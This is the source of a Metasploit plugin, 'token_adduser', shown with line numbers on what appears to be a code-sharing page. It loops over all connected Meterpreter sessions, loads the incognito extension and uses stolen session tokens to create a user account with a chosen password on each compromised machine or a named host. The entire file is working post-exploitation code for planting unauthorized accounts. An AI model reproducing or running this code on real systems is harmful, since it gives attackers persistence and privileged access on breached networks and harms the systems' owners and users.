Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
#
2
# $Id$
3
#
4
# This is a modified version of token_hunter.rb. Credit to
5
# jduck (I believe) for much of the base code here.
6
#
7
# The goal of this script is to attempt to add a user via
8
# incognito using all connected meterpreter sessions.
9
#
10
# jseely[at]relaysecurity.com
11
#
12
# TODO: This should probably find new life as a post module.
13

14
module Msf
15
  class Plugin::TokenAdduser < Msf::Plugin
16

17
    class TokenCommandDispatcher
18
      include Msf::Ui::Console::CommandDispatcher
19

20
      def name
21
        'Token Adduser'
22
      end
23

24
      def commands
25
        {
26
          'token_adduser' => 'Attempt to add an account using all connected meterpreter session tokens'
27
        }
28
      end
29

30
      def cmd_token_adduser(*args)
31
        opts = Rex::Parser::Arguments.new(
32
          '-h' => [ true, 'Add account to host']
33
        )
34

35
        # This is ugly.
36
        if args.empty?
37
          print_line('Usage: token_adduser [options] <username> <password>')
38
          print_line(opts.usage)
39
          return
40
        end
41

42
        opt_user_pass = []
43
        username = nil
44
        password = nil
45
        host = nil
46
        opts.parse(args) do |opt, _idx, val|
47
          case opt
48
          when '-h'
49
            host = val
50

51
          else
52
            # Excuse my weak ruby skills. I'm sure there's a better way to get username and password
53
            # from the args.
54
            opt_user_pass << val
55
          end
56
        end
57

58
        # Again, I'm sure there's a better way to do this.
59
        username = opt_user_pass[0]
60
        password = opt_user_pass[1]
61

62
        framework.sessions.each_key do |sid|
63
          session = framework.sessions[sid]
64
          next unless session.type == 'meterpreter'
65

66
          print_status(">> Opening session #{session.sid} / #{session.session_host}")
67

68
          unless session.incognito
69
            session.core.use('incognito')
70
          end
71

72
          unless session.incognito
73
            print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")
74
            next
75
          end
76
          # print "DEBUG #{username} #{password}\n"
77
          res = session.incognito.incognito_add_user(host, username, password)
78
          next unless res
79

80
          print "#{res}\n"
81

82
          # Currently only stops on success if a user is trying to be added to a specific
83
          # host. I can't think of a good reason to stop on success (or even make it an option)
84
          # when trying to add a user to local sessions.
85
          if host && (res =~ /\[\+\] Successfully|\[-\] Password does not meet complexity requirements|\[-\] User already exists/)
86
            break
87
          end
88
        end
89
      end
90
    end
91

92
    def initialize(framework, opts)
93
      super
94
      add_console_dispatcher(TokenCommandDispatcher)
95
    end
96

97
    def cleanup
98
      remove_console_dispatcher('Token Adduser')
99
    end
100

101
    def name
102
      'token_adduser'
103
    end
104

105
    def desc
106
      'Attempt to add an account using all connected Meterpreter session tokens'
107
    end
108
  end
109
end
110

111